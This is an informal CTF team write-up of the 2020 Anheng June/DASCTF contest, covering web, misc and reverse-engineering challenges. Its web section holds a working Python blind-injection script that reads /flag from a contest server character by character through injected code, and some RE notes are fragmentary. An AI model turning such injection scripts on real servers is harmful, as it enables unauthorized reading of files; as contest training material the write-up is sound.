Screenshot first:
![图片[1]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-15-1024x271.png)
Ahem, the team name is a bit odd. This time I teamed up with mz and Yu; mz basically carried the whole way, I contributed ideas plus misc output, and Yu coasted along with me.
Straight to the content.
web1&web2
These two challenges are essentially the same. On the morning of day 1 the filter was incomplete and you could get straight command execution:
![图片[2]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-16.png)
That was then patched, so we switched to a boolean-based blind approach.
mz threw a script at it and the flag came right out.
Here is the script:
```python
import time
import requests
import re

header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
    'Referer': 'http://183.129.189.60:10026/',
    'Content-Type': 'application/x-www-form-urlencoded'
}
# local intercepting proxy, so every request can be inspected
proxy = {
    'http': '127.0.0.1:8080',
    'https': '127.0.0.1:8080',
}
url = 'http://183.129.189.60:10026'
payload = 'input='
flag = 'DASCTF{53a6ee'   # prefix already known; len() == 13
py = payload + ''
s = requests.Session()
s.headers = header
sum = 0
index = 13               # next unknown flag position
r = s.get(url, proxies=proxy)
# the page shows an arithmetic question inside <h4>...</h4>, ending in '='
x = re.findall("<h4>(.*?)</h4>", r.text)
x = x[0]
x = x[:-1]
sum = eval(x)
# sum: the answer the calculator expects, carried along so the request is accepted
while True:
    end = False
    for i in range(33, 127):
        time.sleep(0.2)
        py = payload + str(sum) + " and open('/flag','r').readline()[" + str(index) + "]=='" + chr(i) + "'"
        print(py)
        r = s.post(url, data=py, proxies=proxy)
        if r.status_code == 200:
            # each response carries a fresh question; keep the answer current
            x = re.findall("<h4>(.*?)</h4>", r.text)
            x = x[0]
            x = x[:-1]
            sum = eval(x)
            if "Congratulations" in r.text:
                flag += chr(i)
                index += 1
                print(flag)
                if chr(i) == '}':
                    end = True
                    break
        else:
            print('error')
            break      # retry the same position from the top of the while loop
    if end:
        break
```
Calculator 2 is not much different from 1... one script handles both, so there is not much more to say.
The point being tested is boolean-based blind injection.
phpuns
![图片[3]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-17.png)
We took first blood on this one (though mz just blasted straight through it, lol).
A quick note anyway: mz said you simply use the session that was provided.
![图片[4]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-18-1024x388.png)
And, uh, it came right out...
![图片[5]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-19-1024x106.png)
For the intended solution see y1ng's writeup: https://www.gem-love.com/ctf/2401.html
misc1:
This one was honestly dumb; only after reading a writeup did I realise how silly it was.
At the start you are given this string:
PiTXPBoBd3OVOMdheMGSOZXXeJXXOJ1ge64WPMGBc3cCPJKDc7W=
From the writeup it turns out the first step is simply extracting a blind watermark:
![图片[6]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-24.png)
Not a single hint given, impressive. Ugh.
Then it is base64 with a substituted alphabet; decode it directly:
```python
import base64

# standard base64 alphabet
a = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
# the challenge's substituted alphabet (same positions, different symbols)
b = '0123456789abcdefGHIJKLMNOPQrstuvwXYZghijklmnopqRSTUVW*ABCDEF@xyz'
c = 'PiTXPBoBd3OVOMdheMGSOZXXeJXXOJ1ge64WPMGBc3cCPJKDc7W='
# map the custom symbols back onto the standard ones, then decode normally
print(base64.b64decode(c.translate(str.maketrans(b, a))))
```
misc2:PhysicalHacker
Only the final step was missing on this one; I got stuck because I did not know about snow steganography. Learned something.
You start with an encrypted capture and a script, so obviously the task is to decrypt it.
Use the script to generate a wordlist, and the tool recovers the password:
![图片[7]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-25.png)
Then just decrypt:
![图片[8]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-26.png)
Standard Wireshark analysis; a txt file is extracted:
![图片[9]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-27-1024x963.png)
This part really messed with my head, and it is where I got stuck in the end. Once I learned it was snow steganography (data hidden in trailing whitespace) it was simple
and the flag came right out.
misc:keyboard
This is the same challenge as in the April contest; it came right out and I picked up free points. Since my writeup data from last time was lost, I'll fill it in here.
Run directly:
```shell
volatility -f Keyboard.raw --profile=Win7SP1x64 filescan | grep keyboard
```
Found:
![图片[10]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-20.png)
Then dump the file out:
```shell
volatility -f Keyboard.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000003d700880 -D ./ -u
```
![图片[11]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-21.png)
Open it in Notepad; the qwe (keyboard substitution) cipher needs no explanation.
Use it directly to decrypt the serect file:
![图片[12]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-22.png)
There was no file to be found, so I looked straight at the NTFS data streams, and there it was:
![图片[13]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-23.png)
misc: Transparency
Clearly easier than the first two, yet worth a pile of points (weird).
You start with an image:
![图片[14]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-28.png)
The challenge name is RGBA, so I instinctively dropped it into Steg...
![图片[15]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-29.png)
And out came an archive.
After extracting it:
![图片[16]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-30.png)
Looks like you brute-force the last two characters; the password came out as nepnb.
And that was it.
RE
Everything below was written by MZ himself; perhaps only he can read it. Hats off in advance.
![图片[17]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-31.png)
RE1
Qfrost expertly opened IDA, Remote Windows debugger
0088A5F2
call 008817C6 jmp 00886700
//
Qfrost expertly opened IDA, Remote Windows debugger
00889AD5
data is stored at
008E7820
ebp-14h holds the input data
//
new function: ecx holds input --> ebp-8h
ebp-14h --> haha1234567890
//ebp-8h --> input
//
strcpy --> 009FFB78, little-endian!
// above eip=00887AE3 there is a block that processes input --> the result is stored at 008D7820
```
00897000 F2 A8 84 EB 98 9F 26 FB 83 94 22 DC
00897010 49 03 2A EA 5E 15 E6 60 56 9E DF D9
00897000 C6 A5 04 53 33 C3 C8 9E 2F 8F 44 E0
00897010 9D 24 2F 28 E4 DC DB 34 78 B8 4C 38
```
// !!! the real comparison function is at 0088531E
flag=
123456789012345678901234
```
008D7820 B9 F2 47 1C 44 B5 9B F9 61 F0 18 B3 C0 4F 2B 70
008D7830 8C AA 87 74 39 EF 11 71
```
XOR with part of those bytes and you get the flag:
```c
#include <stdio.h>

int main(void) {
    /* bytes the program XORs the input with (read out of the debugger) */
    unsigned char c[] = {
        0x88, 0xc0, 0x74, 0x28,
        0x71, 0x83, 0xAC, 0xc1,
        0x58, 0xc0, 0x29, 0x81,
        0xF3, 0x7B, 0x1E, 0x46,
        0xbb, 0x92, 0xBE, 0x44,
        0x08, 0xdd, 0x22, 0x45
    };
    /* bytes the transformed input is compared against at 0088531E */
    unsigned char result[] = {
        0xC6, 0xa5, 0x04, 0x53,
        0x33, 0xc3, 0xc8, 0x9e,
        0x2f, 0x8f, 0x44, 0xe0,
        0x9d, 0x24, 0x2f, 0x28,
        0xe4, 0xdc, 0xdb, 0x34,
        0x78, 0xb8, 0x4c, 0x38
    };
    unsigned char input[25] = {0};   /* 24 flag bytes plus NUL terminator */
    int i;
    /* XOR is its own inverse, so key ^ expected gives the original input */
    for (i = 0; i < 24; i++) {
        input[i] = c[i] ^ result[i];
    }
    printf("%s\n", input);
    return 0;
}
```
RE2:
'
^
select
WHERE
flag=
c92bb6a5+a6c30091+24566d882d4bc7ee
c92bb6a5a6c3009124566d882d4bc7ee
read tt.txt into v8
do AES
2490AAB87A7CB1487B13F0F7A3B316FA
key: f7c6b5a4 1107cfaf
4a5b6c7ffafc7011
==> a6c30091ffffffff ==> v22
v3=30306C3E3E3D3C3A 00l>>=<: v4=mm?kj>l00
v4= :l<jk?mm
RE6:
![图片[18]-安恒六月赛&DASCTF 弱鸡划水记-魔法少女雪殇](http://z.mofalongmao.xyz/wordpress/wp-content/uploads/2020/06/图片-32.png)
Hmm, no analysis of the approach here; you can tell he is way too strong, 55555.
RE4:
A bit of a pity: I got an approximate result, but none of the candidates were correct. Pasting it here for now.
strlen(input) == 32
Nep{*}
iterate from the last character
1. the two mirrored positions, XORed, must then satisfy a condition
0123456789
Nep{mrcladmaoisnotfree}
Y o
i
y O
U o
e _
u O
^ o
n _
~ O
O x
_ h
o X
2. the two mirrored positions, ANDed, must then satisfy a condition
guess:
Nep{mircle_and_maho_is_not_free}
//
Nep{mYrclU_a^dOmaxooisonotofree}/
Nep{mYrclU_a^dOmaxooisonotofree}/
Nep{mYrclU_a^domaXooisonotofree}/
Nep{mYrclU_andOmaxo_isonotofree}/
Nep{mYrclU_andOmaxo_isonotofree}/
Nep{mYrclU_andomaXo_isonotofree}/
Nep{mYrclU_a~dOmaxoOisonotofree}/
Nep{mYrclU_a~d_mahoOisonotofree}=
Nep{mYrclU_a~domaXoOisonotofree}/
Nep{mYrcle_a^dOmaxoois_notofree}/
Nep{mYrcle_a^d_mahoois_notofree}=
Nep{mYrcle_a^domaXoois_notofree}/
Nep{mYrcle_andOmaxo_is_notofree}/
Nep{mYrcle_and_maho_is_notofree}=
Nep{mYrcle_andomaXo_is_notofree}/
Nep{mYrcle_a~dOmaxoOis_notofree}/
Nep{mYrcle_a~d_mahoOis_notofree}=
Nep{mYrcle_a~domaXoOis_notofree}/
Nep{mYrclu_a^dOmaxooisOnotofree}/
Nep{mYrclu_a^d_mahooisOnotofree}=
Nep{mYrclu_a^domaXooisOnotofree}/
Nep{mYrclu_andOmaxo_isOnotofree}/
Nep{mYrclu_and_maho_isOnotofree}=
Nep{mYrclu_andomaXo_isOnotofree}/
Nep{mYrclu_a~dOmaxoOisOnotofree}/
Nep{mYrclu_a~d_mahoOisOnotofree}=
Nep{mYrclu_a~domaXoOisOnotofree}/
Nep{mirclU_a^dOmaxooisonot_free}/
Nep{mirclU_a^d_mahooisonot_free}=
Nep{mirclU_a^domaXooisonot_free}/
Nep{mirclU_andOmaxo_isonot_free}/
Nep{mirclU_and_maho_isonot_free}=
Nep{mirclU_andomaXo_isonot_free}/
Nep{mirclU_a~dOmaxoOisonot_free}/
Nep{mirclU_a~d_mahoOisonot_free}=
Nep{mirclU_a~domaXoOisonot_free}/
Nep{mircle_a^dOmaxoois_not_free}/
Nep{mircle_a^d_mahoois_not_free}=
Nep{mircle_a^domaXoois_not_free}/
Nep{mircle_andOmaxo_is_not_free}/
Nep{mircle_and_maho_is_not_free}=
Nep{mircle_andomaXo_is_not_free}/
Nep{mircle_a~dOmaxoOis_not_free}/
Nep{mircle_a~d_mahoOis_not_free}=
Nep{mircle_a~domaXoOis_not_free}/
Nep{mirclu_a^dOmaxooisOnot_free}/
Nep{mirclu_a^d_mahooisOnot_free}=
Nep{mirclu_a^domaXooisOnot_free}/
Nep{mirclu_andOmaxo_isOnot_free}/
Nep{mirclu_and_maho_isOnot_free}=
Nep{mirclu_andomaXo_isOnot_free}/
Nep{mirclu_a~dOmaxoOisOnot_free}/
Nep{mirclu_a~d_mahoOisOnot_free}=
Nep{mirclu_a~domaXoOisOnot_free}/
Nep{myrclU_a^dOmaxooisonotOfree}/
Nep{myrclU_a^d_mahooisonotOfree}=
Nep{myrclU_a^domaXooisonotOfree}/
Nep{myrclU_andOmaxo_isonotOfree}/
Nep{myrclU_and_maho_isonotOfree}=
Nep{myrclU_andomaXo_isonotOfree}/
Nep{myrclU_a~dOmaxoOisonotOfree}/
Nep{myrclU_a~d_mahoOisonotOfree}=
Nep{myrclU_a~domaXoOisonotOfree}/
Nep{myrcle_a^dOmaxoois_notOfree}/
Nep{myrcle_a^d_mahoois_notOfree}=
Nep{myrcle_a^domaXoois_notOfree}/
Nep{myrcle_andOmaxo_is_notOfree}/
Nep{myrcle_and_maho_is_notOfree}=
Nep{myrcle_andomaXo_is_notOfree}/
Nep{myrcle_a~dOmaxoOis_notOfree}/
Nep{myrcle_a~d_mahoOis_notOfree}=
Nep{myrcle_a~domaXoOis_notOfree}/
Nep{myrclu_a^dOmaxooisOnotOfree}/
Nep{myrclu_a^d_mahooisOnotOfree}=
Nep{myrclu_a^domaXooisOnotOfree}/
Nep{myrclu_andOmaxo_isOnotOfree}/
Nep{myrclu_and_maho_isOnotOfree}=
Nep{myrclu_andomaXo_isOnotOfree}/
Nep{myrclu_a~dOmaxoOisOnotOfree}/
Nep{myrclu_a~d_mahoOisOnotOfree}=
Nep{myrclu_a~domaXoOisOnotOfree}/